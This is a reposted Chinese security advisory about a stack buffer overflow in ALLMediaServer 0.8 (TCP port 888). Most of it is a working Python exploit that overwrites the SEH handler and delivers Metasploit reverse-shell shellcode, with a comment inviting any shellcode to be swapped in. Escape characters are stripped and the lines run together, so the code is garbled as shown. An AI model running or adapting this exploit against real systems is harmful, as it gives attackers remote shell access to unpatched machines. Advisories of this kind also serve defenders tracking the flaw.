发布日期:2012-07-16
更新日期:2012-07-17受影响系统:
allmediaserver allmediaserver 0.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54475ALLMediaServer是免费的通用DLNA服务器。ALLMediaServer 0.8在处理某些网络请求时存在边界错误,通过向TCP端口888发送特制的报文,远程攻击者可利用此漏洞造成栈缓冲区溢出。<*来源:motaz reda
链接:http://secunia.com/advisories/49931/
http://www.exploit-db.com/exploits/19625/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!motaz reda ()提供了如下测试方法:
#!/usr/bin/pythonimport sys, sockets = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((sys.argv[1], 888))buffer = "A" * 1072buffer += "xebx06x90x90" #NSEH jmp short 6buffer += "xcax24xecx65" # SEH POP POP RETN# msfpayload windows/shell_reverse_tcp
# you can replace the shellcode with any shellcode u wantbuffer += ("xd9xc8xd9x74x24xf4xb8xa6xaaxb6xadx5bx2bxc9xb1"
"x4fx83xebxfcx31x43x15x03x43x15x44x5fx4ax45x01"
"xa0xb3x96x71x28x56xa7xa3x4ex12x9ax73x04x76x17"
"xf8x48x63xacx8cx44x84x05x3axb3xabx96x8bx7bx67"
"x54x8ax07x7ax89x6cx39xb5xdcx6dx7exa8x2fx3fxd7"
"xa6x82xafx5cxfax1excexb2x70x1exa8xb7x47xebx02"
"xb9x97x44x19xf1x0fxeex45x22x31x23x96x1ex78x48"
"x6cxd4x7bx98xbdx15x4axe4x11x28x62xe9x68x6cx45"
"x12x1fx86xb5xafx27x5dxc7x6bxa2x40x6fxffx14xa1"
"x91x2cxc2x22x9dx99x81x6dx82x1cx46x06xbex95x69"
"xc9x36xedx4dxcdx13xb5xecx54xfex18x11x86xa6xc5"
"xb7xccx45x11xc1x8ex01xd6xffx30xd2x70x88x43xe0"
"xdfx22xccx48x97xecx0bxaex82x48x83x51x2dxa8x8d"
"x95x79xf8xa5x3cx02x93x35xc0xd7x33x66x6ex88xf3"
"xd6xcex78x9bx3cxc1xa7xbbx3ex0bxdexfcxa9x74x49"
"x03x3ex1dx88x03x2fx81x05xe5x25x29x40xbexd1xd0"
"xc9x34x43x1cxc4xdcxe0x8fx83x1cx6exacx1bx4bx27"
"x02x52x19xd5x3dxccx3fx24xdbx37xfbxf3x18xb9x02"
"x71x24x9dx14x4fxa5x99x40x1fxf0x77x3exd9xaax39"
"xe8xb3x01x90x7cx45x6ax23xfax4axa7xd5xe2xfbx1e"
"xa0x1dx33xf7x24x66x29x67xcaxbdxe9x97x81x9fx58"
"x30x4cx4axd9x5dx6fxa1x1ex58xecx43xdfx9fxecx26"
"xdaxe4xaaxdbx96x75x5fxdbx05x75x4a")s.send(buffer)s.close()建议:
--------------------------------------------------------------------------------
厂商补丁:allmediaserver
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://allmediaserver.org/en/Vivotek网络摄像机信息泄露漏洞MetaSploit Framework "pcap_log"插件本地权限提升漏洞相关资讯 溢出漏洞 栈缓冲区溢出漏洞 ALLMediaServer
- 波音787发电机控制单元整数溢出漏 (05/04/2015 18:47:00)
- Adobe Shockwave Player栈缓冲区溢 (02/20/2013 21:03:00)
- Sony PC Companion Admin_ (12/21/2012 20:03:10)
| - WPS Office "Wpsio.dll"栈缓冲区溢 (05/02/2013 17:16:41)
- Sony PC Companion "DownloadURLTo (12/24/2012 19:14:44)
- VLC Media Player "swf"文件栈缓冲 (12/11/2012 08:15:39)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并
|
易网时代-编程资源站